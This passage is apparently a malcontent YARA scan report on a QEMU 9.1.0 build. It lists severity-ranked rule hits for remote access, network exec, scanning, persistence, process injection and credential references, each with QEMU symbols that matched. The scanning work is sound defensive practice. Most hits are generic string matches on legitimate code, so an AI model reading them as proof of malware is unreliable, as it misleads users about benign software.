[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/event-loop-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fevent-loop-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/host_iommu_](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhost_iommu_&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/hostmem.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhostmem.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/iothread.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fiothread.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | +| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | +| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | +| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | +| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | +| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | +| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | +| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | +| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | +| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | +| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | +| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | +| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | +| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | +| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [QEMU_IS_ALIGNED](https://github.com/search?q=QEMU_IS_ALIGNED&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
